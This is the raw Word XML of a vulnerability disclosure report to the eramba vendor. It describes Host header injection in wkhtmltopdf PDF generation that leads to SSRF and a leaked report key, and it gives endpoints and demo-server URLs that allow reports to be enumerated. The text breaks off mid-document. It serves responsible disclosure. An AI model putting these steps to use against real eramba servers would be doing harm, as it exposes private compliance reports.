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o5pd5hjl66xm" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit found in eramba e2.2.[12-17] on 5.6.2020 by </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">xxxx@xxxx.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your report MUST describe which of the three issues above are of concern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="singl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43.2" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You were able to access to the system or specific functionalities (with write or read permissions) bypassing authentication and authorization controls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43.2" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You are able to affect the data integrity of the software</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A procedure we can repeat that leads to the bug. This is fundamental, step by step what actions, payloads, response headers, scripts, etc you used to exploit the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I was doing a security review of the Eramba source code and found a couple of security issues leading to SSRF (server-side request forgery), privilege escalation, and disclosure of arbitrary files on an Eramba server. As far as I know a user must be authenticated to exploit these vulnerabilities. I am reporting these vulnerabilities to you in this note.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First the default install of Eramba is vulnerable to Host header injection. I have observed this to be the case for certain URLs that generate PDFs using wkhtmltopdf. For APIs that generate PDFs using wkhtmltopdf, an attacker can set the Host header to any IP and the Eramba server will connect to that IP to retrieve content used to generate the PDF. I have observed this to be the case for two API endpoints (though there may be others):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/settings/downloadTestPdf?path=&lt;wkhtmltopdf binary path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/reports/reports/pdf/&lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I am attaching a file request1.txt containing an HTTP GET request and response to the /reports/reports/pdf/&lt;id&gt; endpoint against the public Eramba demo server at </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
            <w:b w:val="1"/>
            <w:i w:val="1"/>
            <w:color w:val="1f73b7"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://demo-e.eramba.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the request notice that the HTTP host header has been changed to the IP address 8.8.8.8. The internal server response from the server shows that the Eramba server tried to connect to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
            <w:b w:val="1"/>
            <w:i w:val="1"/>
            <w:color w:val="1f73b7"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://8.8.8.8/reports/reports/pdfContent/17?key=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;key&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This has two impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Because the key is disclosed in the error response, a user can now enumerate all reports in the system unauthenticated, even if they are configured without privileges to those reports. This is a form of privilege escalation. For instance the user can just access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
            <w:b w:val="1"/>
            <w:i w:val="1"/>
            <w:color w:val="1f73b7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://demo-e.eramba.org/reports/reports/pdfContent/16?key=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
            <w:b w:val="1"/>
            <w:i w:val="1"/>
            <w:color w:val="1f73b7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://demo-e.eramba.org/reports/reports/pdfContent/17?key=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
            <w:b w:val="1"/>
            <w:i w:val="1"/>
            <w:color w:val="1f73b7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://demo-e.eramba.org/reports/reports/pdfContent/18?key=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="343.2" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
